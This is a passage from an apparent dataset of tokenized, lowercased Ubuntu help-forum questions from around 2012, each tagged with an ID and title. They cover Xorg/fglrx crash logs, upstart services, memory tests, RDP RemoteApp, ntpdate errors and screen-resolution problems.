driver for vesa chipsets : vesa [ 23.661 ] ( ii ) fbdev : driver for framebuffer : fbdev [ 23.661 ] ( ++ ) using vt number 7 [ 23.661 ] ( ww ) xf86openconsole : setpgid failed : operation not permitted [ 23.661 ] ( ww ) xf86openconsole : setsid failed : operation not permitted [ 23.661 ] ( ww ) falling back to old probe method for fglrx [ 23.661 ] ( ii ) loading pcs database from /etc/ati/amdpcsdb [ 23.661 ] ( ww ) falling back to old probe method for vesa [ 23.661 ] ( ww ) falling back to old probe method for fbdev [ 23.661 ] ( ee ) no devices detected . [ 23.661 ] fatal server error : [ 23.661 ] no screens found [ 23.661 ] please consult the the x.org foundation support at http : //wiki.x.org for help . [ 23.661 ] please also check the log file at `` /var/log/xorg.0.log '' for additional information . [ 23.661 ] xorg.conf : cat /etc/x11/xorg.conf section `` serverlayout '' identifier `` aticonfig layout '' screen 0 `` aticonfig-screen [ 0 ] -0 '' 0 0 endsection section `` module '' load `` glx '' endsection section `` monitor '' identifier `` aticonfig-monitor [ 0 ] -0 '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' endsection section `` device '' identifier `` aticonfig-device [ 0 ] -0 '' driver `` fglrx '' busid `` pci:1:0:0 '' endsection section `` screen '' identifier `` aticonfig-screen [ 0 ] -0 '' device `` aticonfig-device [ 0 ] -0 '' monitor `` aticonfig-monitor [ 0 ] -0 '' defaultdepth 24 subsection `` display '' viewport 0 0 depth 24 endsubsection endsection is there a way to get the radeon to work in a hybrid configuration or to use the radeon as an opencl only device ? i tried the new catalayst beta ( 12.06 ) and got the following error : cat /var/log/xorg.0.log [ 13.833 ] x.org x server 1.12.2 release date : 2012-05-29 [ 13.833 ] x protocol version 11 , revision 0 [ 13.833 ] build operating system : linux 2.6.24-29-xen x86_64 ubuntu [ 13.833 ] current operating system : linux chimera 3.2.0-24-generic # 39-ubuntu smp mon may 21 16:52:17 utc 2012 x86_64 [ 13.833 ] kernel command line : boot_image=/boot/vmlinuz-3.2.0-24-generic root=uuid=c137757b-486b-4514-9dfe-00c97662cc0d ro quiet splash vt.handoff=7 [ 13.833 ] build date : 05 june 2012 08:35:55am [ 13.833 ] xorg-server 2:1.12.2+git20120605+server-1.12-branch.aaf48906-0ubuntu0ricotz~precise ( for technical support please see http : //www.ubuntu.com/support ) [ 13.833 ] current version of pixman : 0.26.0 [ 13.833 ] before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . [ 13.833 ] markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . [ 13.833 ] ( == ) log file : `` /var/log/xorg.0.log '' , time : wed jun 13 13:43:13 2012 [ 13.833 ] ( == ) using config file : `` /etc/x11/xorg.conf '' [ 13.833 ] ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' [ 13.986 ] ( == ) serverlayout `` aticonfig layout '' [ 13.986 ] ( ** ) | -- > screen `` aticonfig-screen [ 0 ] -0 '' ( 0 ) [ 13.986 ] ( ** ) | | -- > monitor `` aticonfig-monitor [ 0 ] -0 '' [ 13.986 ] ( ** ) | | -- > device `` aticonfig-device [ 0 ] -0 '' [ 13.986 ] ( == ) automatically adding devices [ 13.986 ] ( == ) automatically enabling devices [ 14.134 ] ( ww ) the directory `` /usr/share/fonts/x11/cyrillic '' does not exist . [ 14.134 ] entry deleted from font path . [ 14.134 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi/ '' does not exist . [ 14.134 ] entry deleted from font path . [ 14.134 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi/ '' does not exist . [ 14.134 ] entry deleted from font path . [ 14.166 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi '' does not exist . [ 14.166 ] entry deleted from font path . [ 14.166 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi '' does not exist . [ 14.166 ] entry deleted from font path . [ 14.166 ] ( ww ) the directory `` /var/lib/defoma/x-ttcidfont-conf.d/dirs/truetype '' does not exist . [ 14.166 ] entry deleted from font path . [ 14.166 ] ( == ) fontpath set to : /usr/share/fonts/x11/misc , /usr/share/fonts/x11/type1 , built-ins [ 14.166 ] ( == ) modulepath set to `` /usr/lib/x86_64-linux-gnu/xorg/extra-modules , /usr/lib/xorg/extra-modules , /usr/lib/xorg/modules '' [ 14.166 ] ( ii ) the server relies on udev to provide the list of input devices . if no devices become available , reconfigure udev or disable autoadddevices . [ 14.166 ] ( ii ) loader magic : 0x7fbe0fafbb00 [ 14.166 ] ( ii ) module abi versions : [ 14.166 ] x.org ansi c emulation : 0.4 [ 14.166 ] x.org video driver : 12.0 [ 14.166 ] x.org xinput driver : 16.0 [ 14.166 ] x.org server extension : 6.0 [ 14.166 ] ( -- ) pci : ( 0:0:2:0 ) 8086:0122:1458 : d000 rev 9 , mem @ 0xfb800000/4194304 , 0xe0000000/268435456 , i/o @ 0x0000ff00/64 [ 14.166 ] ( -- ) pci : * ( 0:1:0:0 ) 1002:6898:1787:2289 rev 0 , mem @ 0xd0000000/268435456 , 0xfbdc0000/131072 , i/o @ 0x0000ee00/256 , bios @ 0x ? ? ? ? ? ? ? ? /131072 [ 14.166 ] ( ii ) open acpi successful ( /var/run/acpid.socket ) [ 14.166 ] ( ii ) `` extmod '' will be loaded by default . [ 14.166 ] ( ii ) `` dbe '' will be loaded by default . [ 14.166 ] ( ii ) `` glx '' will be loaded . this was enabled by default and also specified in the config file . [ 14.166 ] ( ii ) `` record '' will be loaded by default . [ 14.166 ] ( ii ) `` dri '' will be loaded by default . [ 14.166 ] ( ii ) `` dri2 '' will be loaded by default . [ 14.166 ] ( ii ) loadmodule : `` glx '' [ 14.188 ] ( ii ) loading /usr/lib/x86_64-linux-gnu/xorg/extra-modules/extra-modules.dpkg-tmp/modules/extensions/libglx.so [ 14.188 ] ( ii ) module glx : vendor= '' advanced micro devices , inc. '' [ 14.188 ] compiled for 6.9.0 , module version = 1.0.0 [ 14.188 ] ( ii ) loading extension glx [ 14.188 ] ( ii ) loadmodule : `` extmod '' [ 14.466 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libextmod.so [ 14.475 ] ( ii ) module extmod : vendor= '' x.org foundation '' [ 14.475 ] compiled for 1.12.2 , module version = 1.0.0 [ 14.475 ] module class : x.org server extension [ 14.475 ] abi class : x.org server extension , version 6.0 [ 14.475 ] ( ii ) loading extension mit-screen-saver [ 14.475 ] ( ii ) loading extension xfree86-vidmodeextension [ 14.475 ] ( ii ) loading extension xfree86-dga [ 14.475 ] ( ii ) loading extension dpms [ 14.475 ] ( ii ) loading extension xvideo [ 14.475 ] ( ii ) loading extension xvideo-motioncompensation [ 14.475 ] ( ii ) loading extension x-resource [ 14.475 ] ( ii ) loadmodule : `` dbe '' [ 14.475 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libdbe.so [ 14.475 ] ( ii ) module dbe : vendor= '' x.org foundation '' [ 14.475 ] compiled for 1.12.2 , module version = 1.0.0 [ 14.475 ] module class : x.org server extension [ 14.475 ] abi class : x.org server extension , version 6.0 [ 14.475 ] ( ii ) loading extension double-buffer [ 14.475 ] ( ii ) loadmodule : `` record '' [ 14.475 ] ( ii ) loading /usr/lib/xorg/modules/extensions/librecord.so [ 14.475 ] ( ii ) module record : vendor= '' x.org foundation '' [ 14.475 ] compiled for 1.12.2 , module version = 1.13.0 [ 14.475 ] module class : x.org server extension [ 14.475 ] abi class : x.org server extension , version 6.0 [ 14.475 ] ( ii ) loading extension record [ 14.475 ] ( ii ) loadmodule : `` dri '' [ 14.476 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libdri.so [ 14.476 ] ( ii ) module dri : vendor= '' x.org foundation '' [ 14.476 ] compiled for 1.12.2 , module version = 1.0.0 [ 14.476 ] abi class : x.org server extension , version 6.0 [ 14.476 ] ( ii ) loading extension xfree86-dri [ 14.476 ] ( ii ) loadmodule : `` dri2 '' [ 14.476 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libdri2.so [ 14.476 ] ( ii ) module dri2 : vendor= '' x.org foundation '' [ 14.476 ] compiled for 1.12.2 , module version = 1.2.0 [ 14.476 ] abi class : x.org server extension , version 6.0 [ 14.476 ] ( ii ) loading extension dri2 [ 14.476 ] ( ii ) loadmodule : `` fglrx '' [ 14.476 ] ( ii ) loading /usr/lib/x86_64-linux-gnu/xorg/extra-modules/extra-modules.dpkg-tmp/modules/drivers/fglrx_drv.so [ 15.256 ] ( ii ) module fglrx : vendor= '' firegl - amd technologies inc. '' [ 15.256 ] compiled for 1.4.99.906 , module version = 8.98.2 [ 15.256 ] module class : x.org video driver [ 15.257 ] ( ii ) loading sub module `` fglrxdrm '' [ 15.257 ] ( ii ) loadmodule : `` fglrxdrm '' [ 15.257 ] ( ii ) loading /usr/lib/x86_64-linux-gnu/xorg/extra-modules/extra-modules.dpkg-tmp/modules/linux/libfglrxdrm.so [ 15.354 ] ( ii ) module fglrxdrm : vendor= '' firegl - amd technologies inc. '' [ 15.354 ] compiled for 1.4.99.906 , module version = 8.98.2 [ 15.354 ] ( ii ) amd proprietary linux driver version identifier:8.98.2 [ 15.354 ] ( ii ) amd proprietary linux driver release identifier : unsupported-8.98 [ 15.354 ] ( ii ) amd proprietary linux driver build date : may 22 2012 21:15:05 [ 15.354 ] ( ++ ) using vt number 7 [ 15.354 ] ( ww ) falling back to old probe method for fglrx [ 15.499 ] ( ii ) loading pcs database from /etc/ati/amdpcsdb [ 15.502 ] ( ww ) unsupported asic id 1002:9403:0000:0000 in control file [ 15.502 ] ( ww ) unsupported asic id 1002:9403:0000:0000 in control file [ 15.502 ] ( ww ) unsupported asic id 1002:9400:0000:0000 in control file [ 15.502 ] ( ww ) unsupported asic id 1002:9400:0000:0000 in control file [ 15.502 ] ( ii ) amd asic control file status : r4 s0 b208 n312 t207 [ 15.502 ] ( -- ) chipset supported amd graphics processor ( 0x6898 ) found [ 15.510 ] ( ww ) fglrx : no matching device section for instance ( busid pci:0 @ 1:0:1 ) found [ 15.510 ] ( ii ) amd video driver is running on a device belonging to a group targeted for this release [ 15.511 ] ( ii ) amd video driver is unsigned [ 15.511 ] ( ii ) fglrx ( 0 ) : pent- > device- > identifier=0x7fbe10444000 [ 15.511 ] ( ii ) fglrx ( 0 ) : === [ xdl_xs112_atiddxpreinit ] === begin [ 15.511 ] ( ii ) loading sub module `` vgahw '' [ 15.511 ] ( ii ) loadmodule : `` vgahw '' [ 15.511 ] ( ii ) loading /usr/lib/xorg/modules/libvgahw.so [ 15.518 ] ( ii ) module vgahw : vendor= '' x.org foundation '' [ 15.518 ] compiled for 1.12.2 , module version = 0.1.0 [ 15.518 ] abi class : x.org video driver , version 12.0 [ 15.518 ] ( ** ) fglrx ( 0 ) : depth 24 , ( -- ) framebuffer bpp 32 [ 15.518 ] ( ii ) fglrx ( 0 ) : pixel depth = 24 bits stored in 4 bytes ( 32 bpp pixmaps ) [ 15.518 ] ( == ) fglrx ( 0 ) : default visual is truecolor [ 15.518 ] ( ** ) fglrx ( 0 ) : option `` dpms '' `` true '' [ 15.518 ] ( == ) fglrx ( 0 ) : rgb weight 888 [ 15.518 ] ( ii ) fglrx ( 0 ) : using 8 bits per rgb [ 15.518 ] ( == ) fglrx ( 0 ) : buffer tiling is on [ 15.518 ] ( ii ) loading sub module `` fglrxdrm '' [ 15.518 ] ( ii ) loadmodule : `` fglrxdrm '' [ 15.518 ] ( ii ) loading /usr/lib/x86_64-linux-gnu/xorg/extra-modules/extra-modules.dpkg-tmp/modules/linux/libfglrxdrm.so [ 15.518 ] ( ii ) module fglrxdrm : vendor= '' firegl - amd technologies inc. '' [ 15.518 ] compiled for 1.4.99.906 , module version = 8.98.2 [ 15.519 ] ukidynamicmajor : found major device number 249 [ 15.519 ] ukidynamicmajor : found major device number 249 [ 15.519 ] ukiopenbybusid : searching for busid pci:1:0:0 [ 15.519 ] ukiopendevice : node name is /dev/ati/card0 [ 15.519 ] ukiopendevice : open result is 12 , ( ok ) [ 15.519 ] ukiopenbybusid : ukiopenminor returns 12 [ 15.519 ] ukiopenbybusid : ukigetbusid reports pci:1:0:0 [ 15.519 ] ( ** ) fglrx ( 0 ) : noaccel = no [ 15.519 ] ( ** ) fglrx ( 0 ) : amd 2d acceleration architecture enabled [ 15.519 ] ( -- ) fglrx ( 0 ) : chipset : `` ati radeon hd 5800 series '' ( chipset = 0x6898 ) [ 15.519 ] ( -- ) fglrx ( 0 ) : ( pcisubvendor = 0x1787 , pcisubdevice = 0x2289 ) [ 15.519 ] ( == ) fglrx ( 0 ) : board vendor info : third party graphics adapter - not original amd [ 15.519 ] ( -- ) fglrx ( 0 ) : linear framebuffer ( phys ) at 0xd0000000 [ 15.519 ] ( -- ) fglrx ( 0 ) : mmio registers at 0xfbdc0000 [ 15.519 ] ( -- ) fglrx ( 0 ) : i/o port at 0x0000ee00 [ 15.519 ] ( == ) fglrx ( 0 ) : rom-bios at 0x000c0000 [ 15.532 ] ( ii ) fglrx ( 0 ) : ac adapter is used [ 15.538 ] [ 15.538 ] backtrace : [ 15.550 ] 0 : /usr/bin/x ( xorg_backtrace+0x34 ) [ 0x7fbe0f891384 ] [ 15.550 ] 1 : /usr/bin/x ( 0x7fbe0f70b000+0x18a16a ) [ 0x7fbe0f89516a ] [ 15.550 ] 2 : /lib/x86_64-linux-gnu/libpthread.so.0 ( 0x7fbe0ea31000+0xfcb0 ) [ 0x7fbe0ea40cb0 ] [ 15.550 ] 3 : /usr/lib/x86_64-linux-gnu/libpciaccess.so.0 ( 0x7fbe0ec4e000+0x4dd4 ) [ 0x7fbe0ec52dd4 ] [ 15.550 ] 4 : /usr/lib/x86_64-linux-gnu/xorg/extra-modules/extra-modules.dpkg-tmp/modules/drivers/fglrx_drv.so ( 0x7fbe0aeba000+0x8032c9 ) [ 0x7fbe0b6bd2c9 ] [ 15.550 ] 5 : /usr/lib/x86_64-linux-gnu/xorg/extra-modules/extra-modules.dpkg-tmp/modules/drivers/fglrx_drv.so ( amd_xs112_int10_xf86extendedinitint10+0xdd ) [ 0x7fbe0b6bd05d ] [ 15.550 ] 6 : /usr/lib/x86_64-linux-gnu/xorg/extra-modules/extra-modules.dpkg-tmp/modules/drivers/fglrx_drv.so ( amd_xs112_int10_xf86initint10+0xb ) [ 0x7fbe0b6bc8fb ] [ 15.550 ] 7 : /usr/lib/x86_64-linux-gnu/xorg/extra-modules/extra-modules.dpkg-tmp/modules/drivers/fglrx_drv.so ( xf86initint10+0xd ) [ 0x7fbe0b20297d ] [ 15.550 ] 8 : /usr/lib/x86_64-linux-gnu/xorg/extra-modules/extra-modules.dpkg-tmp/modules/drivers/fglrx_drv.so ( 0x7fbe0aeba000+0x48405c ) [ 0x7fbe0b33e05c ] [ 15.550 ] 9 : /usr/lib/x86_64-linux-gnu/xorg/extra-modules/extra-modules.dpkg-tmp/modules/drivers/fglrx_drv.so ( xdl_xs112_preinitadapter+0x274 ) [ 0x7fbe0b33dc34 ] [ 15.550 ] 10 : /usr/lib/x86_64-linux-gnu/xorg/extra-modules/extra-modules.dpkg-tmp/modules/drivers/fglrx_drv.so ( xdl_xs112_atiddxpreinit+0x12ad ) [ 0x7fbe0b33f31d ] [ 15.550 ] 11 : /usr/bin/x ( initoutput+0x9c8 ) [ 0x7fbe0f79a058 ] [ 15.551 ] 12 : /usr/bin/x ( 0x7fbe0f70b000+0x3d6dd ) [ 0x7fbe0f7486dd ] [ 15.551 ] 13 : /lib/x86_64-linux-gnu/libc.so.6 ( __libc_start_main+0xed ) [ 0x7fbe0d8c676d ] [ 15.551 ] 14 : /usr/bin/x ( 0x7fbe0f70b000+0x3db9d ) [ 0x7fbe0f748b9d ] [ 15.551 ] [ 15.551 ] segmentation fault at address 0x10448c12 [ 15.551 ] caught signal 11 ( segmentation fault ) . server aborting [ 15.551 ] please consult the the x.org foundation support at http : //wiki.x.org for help . [ 15.551 ] please also check the log file at `` /var/log/xorg.0.log '' for additional information . [ 15.551 ] [ 15.661 ] ddxsiggiveup : closing log [ 15.661 ] server terminated with error ( 1 ) . closing log file . does anyone know how to fix it ?
148148	python script as a service on ubuntu 11.10	i am facing the following problem . i want to run a python script as a service on ubuntu 11.10 system ( already mentioned in the following link : python service using upstart on ubuntu ) i followed the steps mentioned in the above mentioned link , but i got the following error message in syslog : init : script main process ( 21826 ) terminated with status 1 jun 8 16:59:55 bilbo kernel : [ 263012.984531 ] init : script main process ended , respawning jun 8 16:59:55 bilbo kernel : [ 263013.044099 ] init : script main process ( 21827 ) terminated with status 1 the above two lines are getting repeated all the time . on saying sudo start script , i get the following : $ sudo start script script start/running , process 21826 following is the content of my script.conf placed in /etc/init : description `` used to start python script as a service '' author `` bilbo '' start on runlevel [ 2 ] stop on runlevel [ 06 ] exec python /home/bilbo/scripts/webserver.py respawn please tell me what i am doing wrong ? do i have to change my python code as well ?
148154	ubuntu memory test	several months ago i was having issues with a windows pc . i booted from and ubuntu cd , performed a memory test , and found that i had some bad ram . i 'm having some issues with another pc , so i downloaded 12.04 and booted from the cd . the screen that comes up simply gives me the option to try or install . where can i find the memory test ?
148159	remmina remoteapp over rdp	i was wondering how to use remmina to open applications on a windows machine over rdp using remoteapp ( or seamless or whatever it 's actually called ) . i 've already used kim knight 's remoteapp tool to set up remoteapp on a windows 7 machine and i can connect and run remote apps fine from another windows box . allegedly freerdp ( which remmina uses for its rdp plugin ) has support for remoteapp . i 'm not sure how to make use of it though . i ca n't find any examples of people actually doing this online but there is a launchpad bug about the clipboard not working in remote apps , from which i can infer that there is some way to run remote apps . i 've tried many combinations of settings for client , startup program and startup path in the advanced tab when configuring an rdp connection in remmina , but i ca n't make it work . i can connect to windows boxes with rdp just fine , just not running a remoteapp .
148160	unity top panel spread on both dual monitor . necessary ?	i 'm using ubuntu 12.04 with a dual monitor setup . the workspace is spread between the monitors in xinerama mode , not mirror . now , the top panel is present on both the monitors . it 's simply doubled . not a big issue but since i added some indicators to the panel , the load of my little netbook started to increase . and seems that the unity-panel-service eat a lot of resources . so , is there a way to run the to panel in only one monitor , like it 's already possible to do with the launcher ? what do you think ?
148163	`` could not get lock /var/lib/dpkg/lock '' error	i receive the following message : could not get lock /var/lib/dpkg/lock - open ( 13 : permmission denied )
148167	how to import windows ' recent files into the unity `` recent files '' list ?	i had an idea to create a script that will auto-run on startup to import the recent files list from windows into ubuntu 's unity recent-files list . i do n't know anything about how unity stores that information for its recent files but i do know that in windows , the recent files info is stored in a folder called `` recent '' as a bunch of .ink files with the names of the files used . what i would like to do is create a script or maybe later on a small program with a gui for selecting the windows recent directory for the desired user account . howâ would this work ?
148170	how to jailbreak iphone 4gs in ubuntu ?	i 'm new to ubuntu , and i did n't realize how to make it fully friendly with my iphone 4gs . how i would load it into my phone without itunes ? thanks in advance . note : i am using ubuntu 12.04 .
148171	dropbox error - 'echo 100000 | sudo tee / proc/sys/fs/inotify/max_user_watches '	dropbox gives me an error that mentions echo tee 100000 but then it disappears . how to fix or remove msg ?
148175	cant access ephemeral storage on amazon ubuntu instance	i want to utilise my ephemeral storage as mentioned in this question but i seem to be falling at the first hurdle . i ca n't even see /mnt : ~ $ df -ah filesystem size used avail use % mounted on /dev/xvda1 8.0g 855m 6.8g 12 % / proc 0 0 0 - /proc sysfs 0 0 0 - /sys none 0 0 0 - /sys/fs/fuse/connections none 0 0 0 - /sys/kernel/debug none 0 0 0 - /sys/kernel/security udev 288m 8.0k 288m 1 % /dev devpts 0 0 0 - /dev/pts tmpfs 119m 152k 118m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 296m 0 296m 0 % /run/shm this is from a vanilla instance of an ubuntu ami ( 12.04-amd64-server-20120424 ami-a29943cb ) i 'm not bothered about resizing the partition , i just want to be able to use the space for writing temp files .
148176	how to change the icon for qt application ?	how can i change application icon ( launcher icon ) for my qt-application ? now it looks like a question mark and i want to change it .
148184	how do i find which repository a package is coming from ?	when updating in 12.04 , this is what i see : but then i get this : i have the following ppas installed : which ppa , do you think , could be causing my update error ? and what is the problematic ppa ( video4linux ? ) . i 've had these ppas installed for a while without problems . any advice / troubleshooting would be great , thanks .
148187	where does ntpdate get its settings from and what is the `` no servers can be used '' error about ?	when i run ntpdate on its own , i get the following output : 8 jun 15:47:46 ntpdate [ 31251 ] : no servers can be used , exiting if i run it with the -q ntp.ubuntu.com switch , it seems to query just fine . i have been hunting through many files and the most relevant one i have found is /etc/default/ntpdate , however , even with ntpdate_use_conf set to no , i just ca n't understand/see how this error is occurring any ideas ? update -- it appears that ntpdate-debianworks fine and is the actual command that makes use of /etc/default/ntpdate , but this does n't answer the main question and i still ca n't find it ...
148193	update fails after checking all settings for system updates	w : failed to fetch cdrom : //ubuntu 12.04 lts precise pangolin - release i386 ( 20120423 ) /dists/precise/main/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch cdrom : //ubuntu 12.04 lts precise pangolin - release i386 ( 20120423 ) /dists/precise/restricted/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms e : some index files failed to download . they have been ignored , or old ones used instead . the above information is a crash info . it happens when i manually update ubuntu . i have marked all checkboxes in settings that were n't marked by default . what is the reason for this problem ?
148196	firefox 13 's search language changes to local	i have ubuntu 12.04 , and firefox 13 . when i do google search in firefox , it changes from default english to local language . i ca n't find google.xml to change the language settings , and the google 's language search settings do n't hold the saved default language
148199	setting up latex with texmaker	i want to setup latex environment on ubuntu 12.04 64bit machine . as i am making a backup system for windows 7 machine . i have installed the latest version of texmaker 3.3.4 . now i want to know which latex distribution to install for making pdf files . i seen few like xelatex , tex live etc . can you suggest the one which very well maintained and up to date like miktex ( for windows ) ?
148205	asus eee pc 1015cx shows resolution of 800x600 in ubuntu 12.04	i have asus eee pc 1015cx and i wanted to install ubuntu 12.04 , when i used the bootable usb and tried it , the only available option for resolution setting was 800x600 which looks bad on the screen . there is no other option on the menu . how can i enable higher resolution ?
148206	gthumb not showing thumbnails after software update	i just did a software update in 12.04 and it seems that gthumb was included in those updates . suddenly , huge amounts of thumbnails , in the gthumb browser , are not displaying . they 're there because the scrollbar indicates as much , but they 're completely invisible . some show , here and there . any idea what this is related to ? anyone getting the same thing ?
148211	add a database to use with locate command ?	i would like to know if anyone knows how i can create a database of a file system on my computer . so i can choose this data base to search for files on this file system efficiently . i ask this question since in man locate i found that i can choose a database for a different file system . also would be great if /var/lib/mlocate/mlocate.db database can have the data of 2 disks any approach ideas or others would be greatly appreciated .
148213	do barcode scanners work on ubuntu ?	i want to buy a barcode scanner to read labels from our products . i do n't know if it will work on ubuntu . i have the option to get a ciperlab 1070 . will it work if plugged in ?
148215	why does my wireless stop working in ubuntu if i turn it off in windows ?	i recently installed the latest version of ubuntu with wubi , everything works fine , i installed the driver for my wireless card , works great , but i found this problem : on windows 7 , if i turn off the wireless card , then turn off windows 7 , then boot ubuntu , my wireless card wo n't work . is this normal ? is there a fix for this ? i have a dell inspiron 1440
148217	how to boot or `` enter '' into ubuntu 11.04 on ps3 after installing it ?	after failing to install the ubuntu 11.04 desktop version ( burned on a dvd , because iso 's file size was 726 mb ) , i tried the alternate version ( about 686 mb ) which i burned on cd . during the installation process , i manually partitioned the hard drive using ext3 . after the installation , the cd ejects itself and i hit `` continue '' . in the k boot prompt i hit `` enter '' on my the keyboard . i see a welcome message in a dark background ( a kind of full screen terminal/console called cli i think ) and was asked to enter my user name and password . after that , instead of booting into the beautiful desktop of ubuntu , i saw this : ubuntu @ my_name $ it was like a line of command i think , where you can use `` sudo '' commands . it is called a non-graphic mode i think . my real problem is to enter ubuntu 11.04 with the chocolate-colored background and the african music drum . i tried many commands to boot into the graphic mode of the system such as ctr+alt+f7 but nothing happened . in this case , i just saw numbers showing available blocks . i do n't understand . i also tried startx and sudo startx without result . i do bought a ps3 both for gaming and for ubuntu because i ca n't afford buying a pc .
148220	cpu usage goes to 100 % when i lock the screen	whenever i lock the screen , after a certain amount of time , the cpu and the cpu fan go to their limits , and they return back to normal the moment i unlock the screen again ( as shown by psensor ) . how can i find out what process is responsible for this ? i 've tried with `` top -s '' , and the result is this ... pid user pr ni virt res shr s % cpu % mem time+ command 2114 me 20 0 326m 104m 40m r 16 2.6 66:50.03 compiz 1234 root 20 0 396m 152m 98m r 6 3.8 20:23.88 xorg 2204 me 20 0 160m 38m 30m s 4 1.0 0:33.35 yakuake 2446 me 20 0 206m 18m 12m s 4 0.5 6:32.18 psensor 2280 me 20 0 220m 18m 10m s 2 0.5 5:01.60 unity-panel 9138 me 20 0 154m 27m 15m s 2 0.7 0:03.63 plugin-cont 2282 me 20 0 65800 5272 3316 s 1 0.1 4:36.90 hud-service 2143 me 20 0 140m 11m 8352 s 1 0.3 2:50.16 indicator-m 9095 me 20 0 720m 253m 36m s 1 6.4 0:26.34 firefox 2076 me 20 0 7168 3484 828 s 1 0.1 1:46.53 dbus-daemon 2307 me 20 0 55000 5132 3632 s 1 0.1 2:01.55 indicator-a 2557 me 20 0 86328 6028 4576 s 0 0.1 1:44.71 conky 6290 me 20 0 2836 1296 964 r 0 0.0 0:29.64 top 6291 me 20 0 2836 1188 884 s 0 0.0 0:29.49 top 1 root 20 0 3644 1984 1284 s 0 0.0 60:57.76 init specs : fresh installation of ubuntu 12.04 intel core i5 4 gb ram
148221	lenovo s110 netbook screen resolution ubuntu	i am still stuck with 800x600 resolution . here is the output of lspci : 00:00.0 host bridge : intel corporation device 0bf2 ( rev 03 ) subsystem : lenovo device 3983 flags : bus master , fast devsel , latency 0 00:02.0 vga compatible controller : intel corporation device 0be2 ( rev 09 ) subsystem : lenovo device 3983 flags : bus master , fast devsel , latency 0 , irq 7 memory at 86000000 ( 32-bit , non-prefetchable ) [ size=1m ] i/o ports at 50d0 [ size=8 ] capabilities : [ d0 ] power management version 2 capabilities : [ b0 ] vendor specific information < ? > capabilities : [ 90 ] message signalled interrupts : mask- 64bit- queue=0/0 enable- 00:1b.0 audio device : intel corporation n10/ich 7 family high definition audio controller ( rev 02 ) subsystem : lenovo device 390a flags : bus master , fast devsel , latency 0 , irq 22 memory at 86100000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : [ 50 ] power management version 2 capabilities : [ 60 ] message signalled interrupts : mask- 64bit+ queue=0/0 enable- capabilities : [ 70 ] express root complex integrated endpoint , msi 00 capabilities : [ 100 ] virtual channel < ? > capabilities : [ 130 ] root complex link < ? > kernel driver in use : hda intel kernel modules : snd-hda-intel 00:1c.0 pci bridge : intel corporation n10/ich 7 family pci express port 1 ( rev 02 ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=01 , subordinate=01 , sec-latency=0 i/o behind bridge : 00004000-00004fff memory behind bridge : 85000000-85ffffff prefetchable memory behind bridge : 0000000080000000-0000000080ffffff capabilities : [ 40 ] express root port ( slot+ ) , msi 00 capabilities : [ 80 ] message signalled interrupts : mask- 64bit- queue=0/0 enable+ capabilities : [ 90 ] subsystem : lenovo device 3983 capabilities : [ a0 ] power management version 2 capabilities : [ 100 ] virtual channel < ? > capabilities : [ 180 ] root complex link < ? > kernel driver in use : pcieport kernel modules : shpchp 00:1c.1 pci bridge : intel corporation n10/ich 7 family pci express port 2 ( rev 02 ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=02 , subordinate=02 , sec-latency=0 i/o behind bridge : 00003000-00003fff memory behind bridge : 84000000-84ffffff prefetchable memory behind bridge : 0000000081000000-0000000081ffffff capabilities : [ 40 ] express root port ( slot+ ) , msi 00 capabilities : [ 80 ] message signalled interrupts : mask- 64bit- queue=0/0 enable+ capabilities : [ 90 ] subsystem : lenovo device 3983 capabilities : [ a0 ] power management version 2 capabilities : [ 100 ] virtual channel < ? > capabilities : [ 180 ] root complex link < ? > kernel driver in use : pcieport kernel modules : shpchp 00:1c.2 pci bridge : intel corporation n10/ich 7 family pci express port 3 ( rev 02 ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=03 , subordinate=03 , sec-latency=0 i/o behind bridge : 00002000-00002fff memory behind bridge : 83000000-83ffffff prefetchable memory behind bridge : 0000000082000000-0000000082ffffff capabilities : [ 40 ] express root port ( slot+ ) , msi 00 capabilities : [ 80 ] message signalled interrupts : mask- 64bit- queue=0/0 enable+ capabilities : [ 90 ] subsystem : lenovo device 3983 capabilities : [ a0 ] power management version 2 capabilities : [ 100 ] virtual channel < ? > capabilities : [ 180 ] root complex link < ? > kernel driver in use : pcieport kernel modules : shpchp 00:1d.0 usb controller : intel corporation n10/ich7 family usb uhci controller # 1 ( rev 02 ) subsystem : lenovo device 3983 flags : bus master , medium devsel , latency 0 , irq 17 i/o ports at 50a0 [ size=32 ] kernel driver in use : uhci_hcd 00:1d.1 usb controller : intel corporation n10/ich 7 family usb uhci controller # 2 ( rev 02 ) subsystem : lenovo device 3983 flags : bus master , medium devsel , latency 0 , irq 19 i/o ports at 5080 [ size=32 ] kernel driver in use : uhci_hcd 00:1d.2 usb controller : intel corporation n10/ich 7 family usb uhci controller # 3 ( rev 02 ) subsystem : lenovo device 3983 flags : bus master , medium devsel , latency 0 , irq 18 i/o ports at 5060 [ size=32 ] kernel driver in use : uhci_hcd 00:1d.3 usb controller : intel corporation n10/ich 7 family usb uhci controller # 4 ( rev 02 ) subsystem : lenovo device 3983 flags : bus master , medium devsel , latency 0 , irq 16 i/o ports at 5040 [ size=32 ] kernel driver in use : uhci_hcd 00:1d.7 usb controller : intel corporation n10/ich 7 family usb2 ehci controller ( rev 02 ) ( prog-if 20 ) subsystem : lenovo device 3983 flags : bus master , medium devsel , latency 0 , irq 17 memory at 86105000 ( 32-bit , non-prefetchable ) [ size=1k ] capabilities : [ 50 